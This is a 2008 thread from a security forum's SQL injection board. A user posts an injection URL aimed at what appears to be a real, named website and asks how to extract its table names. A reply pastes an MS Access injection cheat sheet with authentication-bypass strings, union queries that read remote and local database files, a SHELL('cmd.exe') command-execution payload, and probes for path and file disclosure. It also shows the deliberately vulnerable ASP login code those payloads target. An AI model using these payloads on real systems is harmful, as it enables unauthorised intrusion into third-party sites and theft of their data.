Login or Register ::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  :: April 19, 2024 Menu  Home  Logout  Discussions  Forums  Members List  IRC chat  Tools  Base64 coder  MD5 hash  CRC32 checksum  ROT13 coder  SHA-1 hash  URL-decoder  Sql Char Encoder  Affiliates  y3dips ITsec  Md5 Cracker  User Manuals  AlbumNow  Content  Content  Sections  FAQ  Top  Info  Feedback  Recommend Us  Search  Journal  Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9145 People Online: Visitors: 578 Members: 0 Total: 578 PacketStorm News ·301 Moved Permanently read more... IT Security and Insecurity Portal www.waraxe.us Forum Index -> Sql injection -> stuck in SQL injection    View previous topic :: View next topic  stuck in SQL injection Posted: Thu Aug 07, 2008 5:31 pm droidman Active user   Joined: Dec 10, 2007 Posts: 31 usually i dont ask for help on sql injection but this time i have no choice since i got really stuck and cant find any information. maybe its just me or.... URL: Code: http://www.buddhaclub.ws/xpressmailing/subscritor.asp?-=&nome=&email=%27UNION%20SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%27&submit=procurar Error: Code: Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC Microsoft Access Driver] Could not find file 'c:\windows\system32\inetsrv\INFORMATION_SCHEMA.mdb'. /xpressmailing/subscritor.asp, line 343 so i cant find any table names and i'm really no expert so.. any help? Posted: Thu Aug 07, 2008 6:59 pm oniric Advanced user   Joined: Jul 24, 2008 Posts: 65 It's a Microsoft Access database. I can post you some info about Access SQLi. I'm sure this would help you Code: % Access SQL Injection % brett.moore_at_security-assessment.com ============================================================================ Nothing new here, move along.. **************************************************************************** % MS Access system tables ****************************************************************************         MSysACEs         MSysObjects         MSysQueries         MSysRelationships **************************************************************************** % MS Access command execution, (older versions only) **************************************************************************** [Auth Page Script]         user = request("user")         pass = request("pass")         Set Conn = Server.CreateObject("ADODB.Connection")         Set Rs = Server.CreateObject("ADODB.Recordset")         Conn.Open dsn         SQL = "SELECT * FROM users where pass='"& pass &"' and user='"& user & "'"         rs.open sql,conn         if rs.eof and rs.bof then                 ' Access Denied         else                 ' Access Allowed         end if [Auth Page Bypass]         user = |SHELL("cmd.exe /c dir > c:\test.txt")|         pass = test **************************************************************************** % Auth Bypass, Basic **************************************************************************** [Auth Page Script]         user = request("user")         pass = request("pass")         Set Conn = Server.CreateObject("ADODB.Connection")         Set Rs = Server.CreateObject("ADODB.Recordset")         Conn.Open dsn         SQL = "SELECT * FROM users where pass='"& pass &"' and user='"& user & "'"         rs.open sql,conn         if rs.eof and rs.bof then                 ' Access Denied         else                 ' Access Allowed         end if [Auth Page Bypass]         user = ' or '1'='1         pass = test **************************************************************************** % Auth Bypass, Simple **************************************************************************** [Auth Page Script]         user = request("user")         pass = request("pass")         Set Conn = Server.CreateObject("ADODB.Connection")         Set Rs = Server.CreateObject("ADODB.Recordset")         Conn.Open dsn         SQL = "SELECT user,pass FROM users where user='"& user & "'"         rs.open sql,conn         if rs.eof and rs.bof then                 ' Access Denied         else                 if (rs("pass") = pass) then                         ' Access Allowed                 else                         ' Access Denied                 end if         end if [Auth Page Bypass Using Shares]         user = ' union select name,password from table1 in '\\share\test\test.mdb         pass = password that is set in \\share\test\test.mdb [Auth Page Bypass Local mdbs]         user = ' union select '0test','0test' from customers in 'C:\winnt\Help\iisHelp\iis\htm\tutorial\eecustmr.mdb'         pass = 0test [Union Notes]         Remeber when using unions the sort order can affect the first record returned. **************************************************************************** % System Path Disclosure **************************************************************************** [Sql String]         user = test' union select names from msysobjects in '. [ODBC Response]         Microsoft OLE DB Provider for ODBC Drivers (0x80004005)         [Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine cannot         open the file 'C:\WINNT\system32'. It is already opened exclusively by another user,          or you need permission to view its data. **************************************************************************** % Verify File Exists **************************************************************************** [Sql String - non-existant file]         user = test' union select name from msysobjects in '\proof [ODBC Response]         Microsoft OLE DB Provider for ODBC Drivers (0x80004005)         [Microsoft][ODBC Microsoft Access Driver] Could not find file 'C:\proof'. [Sql String - existant]         user = test' union select name from msysobjects in '\proof.txt [ODBC Response]         Microsoft OLE DB Provider for ODBC Drivers (0x80004005)         [Microsoft][ODBC Microsoft Access Driver] Unrecognized database format 'C:\proof.txt'. **************************************************************************** % Verify Path Exists **************************************************************************** [Sql String - non-existant path]         test' union select name from msysobjects in '\nopath\sqlerr [ODBC Response]         Microsoft OLE DB Provider for ODBC Drivers (0x80004005)         [Microsoft][ODBC Microsoft Access Driver] 'C:\nopath\sqlerr' is not a valid path.          Make sure that the path name is spelled correctly and that you are connected to the          server on which the file resides. [Sql String - existant path]         user = test' union select name from msysobjects in '\inetpub\sqlerr [ODBC Response]         Microsoft OLE DB Provider for ODBC Drivers (0x80004005)         [Microsoft][ODBC Microsoft Access Driver] Could not find file 'C:\inetpub\sqlerr'. Posted: Fri Aug 08, 2008 9:40 pm oniric Advanced user   Joined: Jul 24, 2008 Posts: 65 This is also some good information. http://www.webapptest.org/ms-access-sql-injection-cheat-sheet-EN.html stuck in SQL injection   www.waraxe.us Forum Index -> Sql injection You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT   Page 1 of 1   All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 Year Oldest FirstNewest First  Select a forum Security Research by waraxe----------------General discussionHow to fixMetasploit related Hash cracking requests----------------MD5 hashesAll other hashesHash related information http://www.waraxe.us portal----------------SuggestionsCooperation proposals Security bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holes Various software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo Gallery Programming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssembler Reverse engineering----------------Newbies cornerDisassemblingPHP script decode requests Miscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy database Direct Downloads----------------ToolsTutorialsWordlists Recycle Bin----------------Removed messagesOutdated posts   Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.120 Seconds